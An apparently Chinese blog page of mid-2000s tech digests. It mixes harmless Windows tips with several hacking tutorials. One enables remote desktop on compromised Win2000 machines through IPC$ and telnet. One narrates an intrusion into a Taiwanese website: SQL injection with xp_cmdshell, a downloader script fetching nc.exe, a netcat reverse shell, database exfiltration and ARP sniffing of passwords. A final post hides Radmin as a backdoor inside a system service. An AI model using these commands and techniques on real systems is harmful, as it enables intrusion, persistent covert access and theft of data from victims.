在win2000 Professional版中安装3389终端服务
众所周知windows2000 profassional并不支持3389终端服务,所以我们如果发现得到管理员密码的肉机是此版本,只能放弃安装终端服务的念头。但是现在我们已经可以在profassional版中安装终端服务了!
方法如下:
1. 将profassional版改变为server版
2. 安装终端服务
关于安装终端服务的细节网络中已经有许多优秀的文章,这里不再重复。
下边就说说如何将profassional版改变为server版:
原理:其实windows 2000的各个版本都使用了同样的程序、动态链接库,它们之间最大的差别是在注册表中。windows2000三合一光盘就证明了这一点。因此只要将profassional版注册表中的相关项目改为server及以上版本,就可以在profassional版中安装终端服务了。
现在3am Laboratories已经将改变win2000版本的方法做成一个非常方便使用的软件:NTSwitch,让我们可以随心所欲地快速改变版本。此软件可以在小凤居中下载到,下载地址为URL http://www.chinesehack.org/down/show.asp?id=2192&down=1
可能由于微软的压力,3am Laboratories已将此软件从其主页中删除,大家快下载吧!
远程版本变换的具体实现方法:
法1:
1 在远程肉机上运行支持图形界面的远程控制程序(如:冰河、PcAnyWhere等)
2 远程控制下,下载并运行NTSwitch改变版本
3 安装3389终端服务
此法非常方便,技术要求最低。但操作过程对方是全部可以看见的,非常危险!
法2:
1 自己将自己本地的win2000 professional改变为win2000 server版,利用注册表对比软件对比版本变换前后注册表的差别。将差别制作成一个chang.reg文件。
2 利用所得到的肉机管理员密码,开启肉机Telnet服务。
3 Telnet上肉机后,利用regedit.exe /s chang.reg 命令, 将远程注册表改变,从而实现远程win2000的版本变换。
此法需要一定的经验,但操作很安全。而且可以用“迷途vb”的方法进一步安装3389终端服务。
以下是“迷途vb”的安装3389终端服务方法
========================
首先我们制作开启3389的工具
先把下面的注册表内容copy一份,另存为3389.reg注册表文件
注册表内容:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionnetcache]
“Enabled”=”0″
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]
“ShutdownWithoutLogon”=”0″
[HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller]
“EnableAdminTSRemote”=dword:00000001
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
“TSEnabled”=dword:00000001
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD]
“Start”=dword:00000002
[HKEY_USERS.DEFAULTKeyboard LayoutToggle]
“Hotkey”=”1″
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSecuService]
“Start”=dword:00000002
“ErrorControl”=dword:00000001
“ImagePath”=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
“ObjectName”=”LocalSystem”
“Type”=dword:00000010
“Description”=”Microsoft”
“DisplayName”=”Microsoft”
再把下面的内容保存为批处理文件3389.bat
安装批处理内容:
copy termsrv.exe eventlog.exe
regedit.exe /s 3389.reg
del 3389.reg
del 3389.exe
del 3389.bat
用winrar制作成exe自解压缩包
61.188.***.*** user:administrato pass:空
先使用工具letmein判断其操作系统
letmein \ip -all -d
TsInternetUser (TsInternetUser)这个是2000的终端用户,现在可以判断其为2000server了
再使用终端登陆软件看看他的3389是不是已经开启了免了费事折腾
应该没有开启了
建立ipc连接
copy工具过去
net use \ipipc$ “pass” /user:name
copy file \ipadmin$system32
用opentelnet开对方的telnet
opentelnet \ip name pass 1 99
用telnet进入
进入到对方的winntsystem32
目录
解压缩3389.exe
运行安装批处理3389.bat
现在我们把对方重起一下,用reboot
我们用ping命令监视他的上线情况,等他下线,呵呵下了,又上来了,不慌连,3389等会才能好,对方的机器有点慢
看见了么,开启成功!
分类 : 系统安全 | 发表时间 25-02-2006
分类 : 技术文摘 | 发表时间 22-02-2006
Windows Installer(windows安装服务)是一种通用的软件发布方式,现在许多软件都使用windows Installer作为自己的安装程序,有时因为各种原因以及windows Installer本身的缺陷,会导致windows Installer出错。
症状一:删除某个程序后,在运行某些软件时,老会弹出一个“windows正在配置Windows Installer,请稍候”的窗口。
解决办法:
1、重新安装Windows Installer,office XP安装盘的根目录有两个名为instmsi.exe和InstMsiW.exe的文件,instmsi.exe用于win9X/Me,InstMsiW.exe用于Win2000/XP;
2、打开组策略→计算机配置→管理模板→Windows组件→Windows Installer→禁用Windows Installer,只是这样一来,很多软件就有能安装了,此法用于Win2000/XP。
3、请看本文最后的“终级解决方案”
症状二:Win2000/XP安装软件时提示“无法访问windows安装程序,服务中windows Installer状态为停止,不能启动”
解决办法:
1、命令提示符下输入:misiexec /regserver
2、在“管理工具”→“服务”中启动windows Installer
症状三:Win2000/XP安装软件时提示“不能访问Windows Installer服务……”
解决办法:
1、检查当前用户有无管理员权限;
2、结束进程Ikernel.exe后再安装;
3、删除系统安装目录Program Files\Common Files\InstallShield\Engine下的所有文件再安装。
4、首先,运行“msiexec /unregserver”,停止Windows Installer服务;
接着,安装InstMsiW.exe(office XP安装盘的根目录下有,也可以从网上下载,地址为:
[url]http://download.microsoft.com/download/WinfowsInstaller/Install/2.0/NT45/EN-US/InstMsiW.exe)[/url],用Winrar解压至设定的目录;进入目录,右键点击msi.inf,选“安装”,右键点击mspatcha.inf,选安装;
最后运行“msiexec /regserver”启用服务。
症状四:安装软件时提示“系统管理员设置了系统策略,禁止进行此项安装”
解决办法:
1、尝试用症状三的解决方法;
2、打开组策略→用户配置→管理模板→Windows组件→Windows安装服务→将“禁止从媒体安装”设为“禁用”,将“永远以高特权进行安装”设置为“启用”
以上问题的终级解决方案:
下载安装微软提供的Windows Installer CleanUp Utility 1.0,它的主要功能是清除程序的Windows Installer配置信息。启动该工具,它会列出目前系统中所有Windows Installer使用安装的软件,选中出问题的软件,然后点“Remove”按钮即可。
Windows Installer CleanUp Utility 1.0下载地址:
http://www.onlinedown.net/soft/27518.htm
分类 : 技术文摘 | 发表时间 23-12-2005
1,win2003服务启动卷影备份服务,点击需要备份的盘符右键先选择备份到哪个盘,然后再启动备份服务.
2,Xp可以直接安装win2003里面system32的client里面的msi安装程序,而win2000与win98需要去微软上面down相应软件.
3,目前为止没有发现winxp等客户端如何手动创建一个卷影备份还原点,这个就不是很方便.
winrar:
WinRAR+任务计划=免费定时备份
如果你在局域网中工作,出于安全,一定要经常备份数据。下面的技巧可以让电脑定时将你的文件自动备份到服务器上,而且只需WinRAR,再加上Windows的计划任务就能轻松实现让电脑自动定时备份、关机备份、空闲备份等功能。
(本例中,要定时备份C:\Work文件夹下的所有新文件到\\Ctipsserver\bak文件夹下,操作系统为Windows 2000/XP。)
一、制作配置文件
启动“资源管理器”,进入C:\Work文件夹。选中并右击所有文件,选择“WinRAR→添加到压缩包”,打开“压缩包名称和参数”窗口,单击“备份”标签,勾选“按掩码产生压缩文件名”复选框。接着单击“常规”标签。并单击“浏览”按钮,把文件保存到\\Ctipsserver\bak文件夹下。
接着,单击“配置”按钮,选择“保存当前配置为新配置”,在“配置名称”中输入备份方案名,如“备份Work文件内容”,同时选中“保存档案文件名”和“保存选定文件名”及“在桌面创建快捷方式”前的复选框。单击“确定”按钮返回“保存档案文件名和参数”窗口,按下“确定”按钮备份文件。
二、定时备份
点击“开始→设置→控制面板→任务计划”。接着,把桌面上的“备份Work文件内容”快捷方式拖放到“任务计划”窗口。然后双击“备份Work文件内容”图标,设置其属性。
单击“日程安排”标签,单击“任务计划”下拉列表框,从中选择“每天”,而“开始时间”设置为自己的时间。再单击“设置”标签,取消选中“电源管理”下的“如果计算机使用电池来运行,不要启动任务”。
通过上述设置后,到了你设置的时间,电脑就会自动备份C:\Work下的所有所有文件到\\Ctipsserver\bak文件夹下,且会按备份的日期和时间作为文件名,如work20030306141726.rar、work20030306151826.rar等。
小提示
★如果想在电脑空闲时备份数据,可单击“任务计划”下拉列表框,从中选择“空闲时”,在“当计算机空闲时间超过xx分钟”处将时间改为10分钟。完成以上设置后,按“确定”按钮,再在打开的窗口中输入系统管理员密码,退出设置窗口。这样,当10分钟后没有操作,电脑会自动备份数据。
★系统启动时自动备份:单击“任务计划”下拉列表框,从中选择“在系统启动时”,系统在启动时将会自动备份数据。
★备份完成后就关机:如果你是5点下班,那可以在制作WinRAR配置文件时,单击“高级”标签,然后选中“完成操作后关闭计算机电源”复选框。然后设置任务计划在5点钟备份数据,这样备份完数据后,电脑会自动关闭。
分类 : 技术文摘 | 发表时间 11-12-2005
在一次安装游戏前建立的系统还原点消失了,取而代之的只有一个系统检查点。该如何恢复原来设定的还原点呢?启动“控制面板→管理工具→事件查看器”,在事件查看器中选择“系统”,找到丢失还原点的信息文件,查看属性看到:系统还原服务被暂停。
可能是因为在驱动器C:\上没有足够的磁盘空间,一旦在系统驱动器上有至少200MB可用磁盘空间,系统还原将自动恢复服务。
第一步,找到系统盘根目录下的System Volume Information文件夹,中文可以翻译为“系统卷标信息”。这个文件夹里就存储着系统还原的备份信息.
第二步,备份System Volume Information。最简单的方法就是直接复制一个副本,但考虑到备份文件的可维护性,应该采用必要的压缩。
第三步,如果系统采用NTFS分区,我们如果直接点击System Volume Information文件夹则会出现警告。因为System Volume Information文件夹在默认情况下只让系统访问,即便大家采用Administrators组的成员登录,也是如此。
之后再单击System Volume Information文件夹,选择WinZIP或者WinRAR将它压缩即可。
压缩完成之后,将压缩文件拷贝到安全的地方。之后,不论是因为磁盘空间不够用系统自行关闭系统还原功能或是我们手动关闭系统还原功能,只要我们重新开启系统还原功能,再手动删除System Volume Information文件夹中的所有文件夹和文件(重新开启系统还原功能时系统自己建立的还原点文件),然后将备份的压缩文件解压缩到System Volume Information文件夹,再启动系统还原就可以了。
来自链接:http://spaces.msn.com/members/bkitty-1/Blog/cns!1pqaY249QxPQydEBZxG3RSIw!412.entry
作者: 网络咖啡
来 源: 《黑客防线》
久没有入侵了,手有点痒,随便逛了几个TW的网站想找一个有点的价值的网站玩玩,于是找到了这个网站。
习惯性的,在“报名账号”处填入了一个单引号,返回了如下信息:
SQL Server 的 Microsoft OLE DB 提供者 (0x80040E14)
遗漏字符字符串 ''' 前面的引号。
/rdshow/modify.asp, line 5
看来是存在注入漏洞的,来看看权限如何。继续在登陆口输入’ and user>0 and ‘’=’,问题出现了:无法完整输入。看来网页对输入长度做了限制,这个难不到我。保存网页,将网页的源代码更改两个地方,一处是Action=modify.asp改为Action=http://www.xxx.org.tw/rdshow/modify.asp,还有一处就是把输入字符的长度改大,也就是maxlength=10改为100,这下可以不受限制的随便输入了。将刚才的代码完整输入后得到以下信息:
SQL Server 的 Microsoft OLE DB 提供者 (0x80040E07)
将 nvarchar 数值 'dbo' 转换成数据型别为 int 的数据行语法错误。
/rdshow/modify.asp, line 5
看来有戏,但是这样注入太麻烦了。再看看网页的源代码,如果将这个注入漏洞转化成URL的形式,这样注入就方便多了。同时转化后还有一个很好的优点,就是可以使用NBSI之类的注入工具,大大简化了我们的注入过程。转化后的URL为http://www.xxx.org.tw/rdshow/ modify.asp?bidno=fuck。现在WEB和SQL的主机分开的情况很多,首先我们还是先看看数据库的IP地址吧。打开天网,然后在IE提交:
http://www.xxx.org.tw/rdshow/modify.asp?bidno=fuck’;exec master.dbo.xp_shell’ ping myip’;–
从天网的报警日志看出数据库的IP地址为210.208.xxx.253,再Ping www.xxx.org.tw,得到的IP地址却为210.208.xxx.32,看来数据库和WEB服务器不是同一台主机,但是从IP分布来看,这两台主机处于同一个网段,理论上只要我们能攻占下数据库主机,要渗透到WEB服务器也不是难事(后来证明确实如此)。到了这一步,还是先用Superscan扫描一下数据库主机开了些什么端口吧。
小提示:先对数据库服务器扫描的好处有很多,比如可以探测对方是否开了防火墙,是否有FTP或者WEB服务,这样才能确定下一步该怎么注入。
扫描的结果是数据库有防火墙,我的想法是先上传一个NC上去,先得到一个反向的Shell再说。我尝试了很多方法才传上去,先用Tftp没有成功,FTP也没有成功。如果数据库有WEB服务的话还可以写入一个WebShell,可惜没有。没有办法,只好写Iget.vbs(脚本小子:广告时间!黑防上个月开放的下载系统中有下载,地址是www.hacker.com.cn/downweb/index.asp,里面还有一些小东西也挺不错,欢迎大家下载使用,并推荐你觉得功能上有特点的程序),然后让对方下载我WEB服务器上的NC。好,决定后就这样做,继续在IE提交:
http://www.xxx.org.tw/rdshow/modify.asp?bidno=fuck';exec master.dbo.xp_cmdshell'echo iLocal = LCase(WScript.Arguments(1)) > c:\winnt\system\p.vbs';–
http://www.xxx.org.tw/rdshow/modify.asp?bidno=fuck';exec master.dbo.xp_cmdshell'echo iRemote = LCase(WScript.Arguments(0)) >> c:\winnt\system\p.vbs';–
http://www.xxx.org.tw/rdshow/modify.asp?bidno=fuck';exec master.dbo.xp_cmdshell'echo Set xPost = CreateObject(“Microsoft.XMLHTTP”) >> c:\winnt\system\p.vbs';–
http://www.xxx.org.tw/rdshow/modify.asp?bidno=fuck';exec master.dbo.xp_cmdshell'echo xPost.Open “GET”,iRemote,0 >> c:\winnt\system\p.vbs';–
http://www.xxx.org.tw/rdshow/modify.asp?bidno=fuck';exec master.dbo.xp_cmdshell'echo xPost.Send() >> c:\winnt\system\p.vbs';–
http://www.xxx.org.tw/rdshow/modify.asp?bidno=fuck';exec master.dbo.xp_cmdshell'echo Set sGet = CreateObject(“ADODB.Stream”) >> c:\winnt\system\p.vbs';–
http://www.xxx.org.tw/rdshow/modify.asp?bidno=fuck';exec master.dbo.xp_cmdshell'echo sGet.Mode = 3 >> c:\winnt\system\p.vbs';–
http://www.xxx.org.tw/rdshow/modify.asp?bidno=fuck';exec master.dbo.xp_cmdshell'echo sGet.Type = 1 >> c:\winnt\system\p.vbs';–
http://www.xxx.org.tw/rdshow/modify.asp?bidno=fuck';exec master.dbo.xp_cmdshell'echo sGet.Open() >> c:\winnt\system\p.vbs';–
http://www.xxx.org.tw/rdshow/modify.asp?bidno=fuck';exec master.dbo.xp_cmdshell'echo sGet.Write(xPost.responseBody) >> c:\winnt\system\p.vbs';–
http://www.xxx.org.tw/rdshow/modify.asp?bidno=fuck';exec master.dbo.xp_cmdshell'echo sGet.SaveToFile iLocal,2 >>c:\winnt\system\p.vbs';–
现在把NBSI2请出来,用其自带的NB command命令执行器查看VBS是否写入成功(用NB TreeList目录列表工具也可以,不过要等半天才能等到结果,我的性子急,所以选择了前者)。
可以看出VBS生成成功了,现在我们可以用这个VBS去下载后门木马之类的东西了。话不多说先把Tlist,NC,Kill传上去再说,继续在IE提交如下URL:
http://www.xxx.org.tw/rdshow/modify.asp?bidno=fuck';exec master.dbo.xp_cmdshell 'c:\winnt\system\p.vbs http://myip/nc.exe nc.exe';–
http://www.xxx.org.tw/rdshow/modify.asp?bidno=fuck';exec master.dbo.xp_cmdshell 'c:\winnt\system\p.vbs http://myip/kill.exe kill.exe';–
http://www.xxx.org.tw/rdshow/modify.asp?bidno=fuck';exec master.dbo.xp_cmdshell 'c:\winnt\system\p.vbs http://myip/tlist.exe tlist.exe';–
现在我们可以利用上传的NC得到一个反向的Shell了,先在本机用NC监听8000端口:
Nc.exe –l –v –p 8000
然后在IE输入:
http://www.xxx.org.tw/rdshow/modify.asp?bidno=fuck';exec master.dbo.xp_cmdshell 'c:\winnt\system\nc.exe –e cmd.exe myip 8000 ';–
这样我们就获得了一个CmdShell了。
为什么我要上传Tlist呢?因为我想知道对方用的是什么杀毒软件,这样我们才能做到有的放矢,不至于我们上传的东东全部被查杀。上传Tlist还有一个原因就是刚刚开始我在绕过对方的防火墙时调用了FTP,为了不让对方怀疑,我必须把它Kill掉,所以也得上传Tlist来看看PID号。Tlist的结果是对方用的诺顿。
小提示:获取对方系统的杀毒软件对后面的入侵是很有帮助的,因为不同的杀毒软件对不同的黑软定义的特征码是不一样的,也就是说某些黑软不被金山查杀,不代表可以瞒过诺顿,反之一样。
晕了,我菜,只会找瑞星的特征码,诺顿的找不出来,想传几个反弹木马上去的想法放弃了。上去溜了一圈发现D盘下面有不少数据库的备份,我喜欢,先Down下来再说。但新的问题又来了,Tftp和TTP不能用,对方又有硬件防火墙,而Iget.vbs又只能下载,没有办法上传东西,反弹木马可以实现上传但对方又有杀毒软件……现在我的思路开始陷入困境,正在我一筹莫展的时候我想到了饭哥,他应该有点好东东可以解决我的这个问题吧?把大概情况给他说了之后,他仰天大笑三声之后给了我一个他自己写的小工具:HttpPut,这个工具可以将对方的文件传到自己的电脑上来,简单方便。使用方法为:
Useag:E:\HttpPut.exe [URL] [PutFilePath]
Sample:E:\HttpPut.exe http://hostname/images/ c:\p.txt
先传了几个Word文件,一切正常,但是当我传到后面较大的数据库文件时却发现不太稳定,Shell很容易挂掉,尝试了很多次都这样(汗,这时进程里面多了X个Cmd.exe,幸好我上传了Tlist和Kill,把那些挂了的CMD一个一个地Kill掉)。
又一次陷入了困境,我本来想再去各大黑客网站找最新的反弹木马,但是老天偏偏和我作对,找了半天都找不到一个满意的。就在我快绝望的时候我的眼前突然一亮:NC不就可以突破防火墙传文件吗?不然怎么叫瑞士军刀?看来我是骑驴找驴了。在NC的高级应用里面就有传文件的方法,具体命令如下:
nc -vv -l -p port > pathfile
nc -d myip port < pathfile
第一条命令是在本机输入,这里要注意的是新开的端口不能被占用,第2条命令在肉鸡执行,大家可以看看我执行的结果。
文件正常传输了,而且相当稳定,看来NC确实不错。数据库顺利下载完毕,但我们的任务还没有完成,虽然是“简单任务”但也不能太简单了啊!我们还要入侵WEB服务器。
以前见过不少的文章,写到这种情况大概就是说上传一个ArpSniffer进行嗅探就草草结束,其实问题没有那么简单,要使用Arpsniffer,必须安装WinPcap,问题是WinPcap是图形界面下的程序,要命令行安装确实要费点周折,很多菜鸟也头疼在这里。我还是简单为大家介绍一下怎么在命令行下安装Winpcap吧,具体的方法如下:
以WinPcap 3.0a为例,通过比较安装前后的文件系统和注册表快照,很容易了解整个安装过程。除去卸载的部分,关键的文件有三个:Wpcap.dll,Packet.dll和Npf.sys。前面两个文件位于System32目录下,第三个在System32\drivers下,而注册表的变化是增加了一个系统服务NPF。注意,是系统服务(即驱动)不是Win32服务。
作为系统服务,不但要在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services下增加主键,而且也要在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root下增加主键,而后者默认只有SYSTEM身份才可以修改。幸运的是并不需要手动添加它,Winpcap被调用时会自动搞定,甚至完全不用手动修改注册表,所有的事Winpcap都会自己完成,只需要将三个文件复制到合适的位置就行了。
作为范例,还是演示一下如何修改注册表,其实利用Inf文件就可以实现,将下面这些内容保存为_wpcap_.inf文件:
[Version]
Signature=”$WINDOWS NT$”
[DefaultInstall.Services]
AddService=NPF,,winpcap_svr
[winpcap_svr]
DisplayName=Netgroup Packet Filter
ServiceType=0×1
StartType=3
ErrorControl=1
ServiceBinary=%12%\npf.sys
再写一个批处理_wpcap_.bat:
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 %CD%\_wpcap_.inf
del _wpcap_.inf
if /i %CD%==%SYSTEMROOT%\system32 goto COPYDRV
copy packet.dll %SYSTEMROOT%\system32\
copy wpcap.dll %SYSTEMROOT%\system32\
del packet.dll
del wpcap.dll
:COPYDRV
if /i %CD%==%SYSTEMROOT%\system32\drivers goto END
copy npf.sys %SYSTEMROOT%\system32\drivers\
del npf.sys
:END
del %0
然后用Winrar将所有文件(5个)打包为自解压的exe,并将“高级自解压选项”->“解压后运行”设置为_wpcap_.bat,命令行的Winpcap安装包就制作完成了。
以上方法只是给大家参考,此时我已经有了另外的更加简单方便的思路,就是给数据库的主机开终端服务,这样无论是传东西还是继续向内网的渗透都会方便很多。大家也许会问即使你有权限添加账号能开终端服务,但是对方有防火墙你怎么连接啊。呵呵,这个问题其实很好解决,相信大家都知道VIDC类软件吧,这类软件的作用就是将内网的端口映射到公网的IP端口上来,这样我们只需要连接公网的IP就可以连接到内网去了。在这里我用的是yyc写的VIDC软件的修改版,
小知识:yyc写的VIDC软件的修改版分客户端和服务器端,服务器端Idc.exe在具有公网IP的肉鸡上运行,使用默认8080端口通信。
直接在肉鸡运行就OK了,客户端vIDCc.exe、vIDCc.DLL,xl.ini文件,按INI文件里的配置自动连接绑定端口,INI的内容如下:
Serverip=公网IP
Serverport=8080
Cip=127.0.0.1
Bport=21|80|3389
Yport=7779|7776|7778
先还是用Iget.vbs将这些东西传上去,然后在CmdShell里面添加一个账号,然后写一个BAT开启3389,等电脑重启之后再上去运行vIDCc.exe。OK大功告成,我们只要登陆肉鸡的7778端口就可以访问内网数据了。
呵呵,现在我们可以在图形界面下安装Winpcap了,我们已经完全控制了数据库,但是任务还没有完,我们先看看能不能嗅探到WEB服务器的信息。先执行下面的命令:
tracert 210.208.xxx.32(WEB服务
器的地址)
看看返回结果看来有戏,三下五除二装好Winpcap,然后开始ArpSniffer,嗅探的命令为:
Usage: ArpSniffer <IP1> <IP2> <Sniffer TCP Port> <LogFile> <NetAdp> [/RESET]
在这里我监听的是21端口,命令如下:
Arpsniffer 210.208.xxx.1 210.208.xxx.32 21 c:\winnt\system\pass.txt 1
接下来就是等待了,不过臭要饭的急着催文章,所以文章截至时还没有结果,如果大家有兴趣的话,下期我再告诉大家。这次简单任务也该结束了,下期见!
分类 : 技术文摘 | 发表时间 23-11-2005
移动硬盘学问大,如何用好移动硬盘以确保数据的安全转移和存储,就成为时下较为关注的一个话题。为了解除大家的后顾之忧,小编将就这一话题细致地为读者朋友做一下讲解,以期可以为大家提供更多实用的帮助。由于移动硬盘是一个非标准的USB设备,使用中远不像鼠标等小型USB设备可靠,问题也较多,因此多了解一下相关的使用方法还是非常有必要的。
接下来将就移动硬盘常见的多发情况和大家作一下交流。
经验分享:
1、尽量不要选购过于廉价的产品,因为价格将决定移动硬盘盒的用料情况,而用料过于简省则无法保证移动硬盘的稳定运行,为将来应用带来隐患,建议大家多考虑做工优秀且有品质保证的产品。
2、移动硬盘分区最好不要超过2个,否则在启动移动硬盘时将会增加系统检索和使用等待的时间。使用Full Speed USB2.0(以前称USB1.1)传输接口的用户更应忌讳,否则将浪费掉许多宝贵的时间。
3、使用用料一般的移动硬盘盒,最好不要插在电脑上长期工作,移动硬盘是用来临时交换或存储数据的,不是一个本地硬盘。相比于内置硬盘会时刻都工作在恶劣的环境下,应该尽量缩短工作时间。如果有需要转存下载资料的,正确的使用方法是使用本地硬盘下载和整理资料等,然后copy到移动硬盘上,而不要在移动硬盘上完成。做工较好的移动硬盘盒也可以尽量按此操作,毕竟可以更稳妥一些。
4、不要给移动硬盘整理磁盘碎片,否则会很容易损伤硬盘。如果确实需要整理,方法可采用将整个分区里面的数据都copy出来,再copy回去。
5、移动硬盘认不出或者copy会断线该如何解决呢?
(1)最好不使用USB延长线,这种线的质量一般不太好,会使USB数据同步出错,使移动硬盘不能正常工作。如果机箱上的前置USB接口无法保证正常使用,多半为供电问题,应尽量把移动硬盘插在原主板背板的USB接口上。
(2)劣质USB硬盘盒做工不佳,导致出现供电不足或是数据丢失等现象。可尝试更换劣质数据线为带屏蔽层的优质USB线;若情况依旧,可借用或调换一块硬盘试验一下;如果还不成,最可靠的办法还是及早更换移动硬盘盒。
(3)USB接口兼容性不佳,目前这一状况已较为少见但仍不排除。
6、如何解决供电不足呢?
(1)购买做工较好且有品质保证的USB移动硬盘盒。
(2)购买低功耗的笔记本硬盘做移动硬盘。
(3)购买笔记本电脑等USB接口较少的设备时,要多考虑一下其USB接口的供电能力。
(4)移动硬盘盒最好自身带有辅助供电线,好的移动硬盘盒会提供变压器,一般的移动硬盘盒也有单独的PS2或者USB供电线,供电不足时一定要插上,即使USB接口供电足够带动硬盘,如果不是短时间工作,建议也插上,USB接口的供电总是比较勉强。
7、不要混用供电线,由于移动硬盘盒的供电线存在专用现象,供电线接口电压可能会有所不同,乱插轻则烧盒子,重则烧硬盘。
8、如何让移动硬盘速度更快一些?
copy大的文件肯定比细碎的小文件有效率,太过细碎的小文件建议可以用winrar打包后(压缩方式采用“存储”即可)再copy。
9、带有1394接口的移动硬盘有哪些讲究?
(1)供电:机器自带的6针1394接口额定电流为1A,已经足够带动所有移动硬盘,甚至台式机硬盘。4针口不供电,必须给移动硬盘另外供电。笔记本PC卡接出来的1394接口也不能供电,必须给PC卡或者移动硬盘额外供电。
(2)1394接口以TI双芯片为最佳;ricoh也很不错,不过很少出现在零售的卡里,IBM X系列板载的常常是ricoh的,ALI的也可以,VIA相对较为一般(台式机主板板载的多为这个),不过相对而言做工远比芯片重要。
(3)一般移动硬盘盒的1394大多采用Oxford911桥接芯片,目前还没有看到缩水的芯片。oxford922是一款更加优秀的IC集成芯片,单芯片搞定usb2.0/1394双接口,现在已经有一些高档3.5寸移动硬盘盒使用,2.5寸的移动硬盘盒还没有看到。PL-3507是台湾一家IC设计公司的产品,同样是单芯双接口,性能目前还不是很了解。
(4)1394接口的最大优点是CPU占有率低。
10、妥善保护移动硬盘。切忌摔打,轻拿轻放;注意温度,不要过热;干燥防水,先退后拔。
编后语:
以上十点内容不知是否对大家正确使用移动硬盘起到了应有的帮助作用?如果有什么疏漏或是更好的建议,都欢迎读者朋友随时留下精彩的评论,以资交流。当今时代财富已经由具体的实物转向了抽象的数字描述,数据的安全性和重要性已经不可同日而语,对于商务人士、记者编辑、公关销售人员等尤为重要。为了确保数字生活顺畅快乐,在此提醒大家务必养成经常备份的好习惯,这样才会遇事不乱、遇变不惊。
分类 : 技术文摘 | 发表时间 01-11-2005
首先说说Radmin,Radmin真是个好东西,我也是最近才发现这个东西的好处,譬如不被杀,管理很方便,速度也很快,配置简单……反正我是看到很多管理员就是选用的这个。尽管是个好东西,缺点还是有的,譬如那个服务名就很显眼,进程里的那个R_server.exe更是被人见到就杀,现在一个最菜的管理员也知道用任务管理器去查杀进程,配置的时候如果出错也很容易被发现,他的那个图标也很有个性,有个性就容易被发现,还有就是有人抱怨那个服务名总是R_server在服务管理器里很是显眼……但是,本着我对Radmin的热爱,还是要把这个好东西从管理员的眼皮底下挽救回来,改造成属于自己的终极木马,至于如何挽救这个好马那就跟我来看看吧!
首先说说配置,然后是隐藏。配置我想不用多说,以前黑x有文章已经说得很清楚了,网管想看到的东西你不要让他看到就可以了。我们知道Radmin只需要R_Server.exe,AdmDll.dll和raddrv.dll这三个文件就可以安装,所以你首先要将这几个文件传到对方机器上,嫌麻烦的话后面有好的办法。至于Radmin的配置,可以先在自己的机器上配置好然后导出[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]下的内容,传到别人机器上导入,Radmin就跟你机器上配置的一样了,因为Radmin服务依赖的东西都在这个项下面。注意的几个是不要任务栏显示,不要日志记录,然后修改自己的密码什么的基本就可以了。我配置的如下:
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
“NTAuthEnabled”=hex:00,00,00,00
“Parameter”=hex:fc,e2,fe,2b,e9,24,fd,11,67,bd,be,3b,5c,e1,ac,8b
“Port”=hex:8b,05,00,00
“Timeout”=hex:0a,00,00,00
“EnableLogFile”=hex:00,00,00,00
“LogFilePath”=”c:\\logfile.txt”
“FilterIp”=hex:00,00,00,00
“DisableTrayIcon”=hex:01,00,00,00
“AutoAllow”=hex:00,00,00,00
“AskUser”=hex:00,00,00,00
“EnableEventLog”=hex:00,00,00,00
这样配置的密码是jnc,端口是1419,不要急,具体的注册表文件config.reg已经带在后面了,想修改自己的密码和端口的话可以从自己机器上找到相应的注册表键值替换就OK了。但是注意,Radmin是从这个键值下读取相应的参数,所以每次用rededit -s导入注册表的时候,要先停服务然后启动服务才有效的。什么,你不知道怎么安装radmin,自己看以前的文章去!好了,配置就说这么多,这样配置的尽管不会被普通的用户发现,但是上面的几个缺点也都出来了,稍微有一点经验的管理员就很可以发现。
关于服务隐藏以前魔女的条件也说过,但是不是很行得通,她是想把系统的剪贴薄删掉,然后把自己的Radmin伪装成剪贴薄,看起来是很好,可是事实上呢?我不说删除clipsrv.exe时系统弹出来的那个文件保护对话框没有办法解决,如图一。还有就是你的服务显示名称可以伪装,但是服务名还是R_server,这个没有办法变的,很容易被识破。我们可以不删除服务然后替换而是直接将系统的服务的本质改成我们的,但是让其他的譬如服务名等都不做任何变化,不了解内幕的人是很难看出来的。下面我们就将Radmin隐藏到系统的服务里面,我们将他的可执行文件路径改了就行了的。不只是Radmin,其他的后门如木马,还有Tcmd等他们本身默认安装的隐蔽性并不是很好,但是可以通过类似的方法来改造。首先是选我们要代替哪个服务,这里我推荐用那些不依赖其他任何服务就能自己启动的服务,否则会出现不能顺利启动的情况,当然也不能被其他人所依赖了,人家系统挂了就完了:)。那些用svchost.exe的就不要看了,呵呵。这里我推荐sysmonlog服务,就是那个”配置性能日志和警报”服务,符合我们的条件并且还不会被一般的管理员所注意,看看我如何做的吧。假设我们已经安装了Radmin,注册表文件已经导入,现在的Radmin的程序名字还是R_server.exe,在系统目录下。我们停掉Radmin服务后先把他的名字改成sm1ogsvc.exe。为什么改成这个?呵呵,不觉得1和l很像么?好了,改名之后我们可以来替换了。Sc这个工具知道吧,用以下的命令:
sc config sysmonlog start= auto \\将”配置性能日志和警报”服务设置成自启动,没有什么疑点吧?\\
sc config sysmonlog binpath= “c:\winnt\system32\sm1ogsvc.exe /service” \\修改其二进制路径,其实就是我们伪装的Radmin\\
net start sysmonlog \\启动服务,Radmin又开始工作啦\\
sc delete r_server \\删掉我们开始的Radmin服务,让Radmin在别人眼里完全消失\\
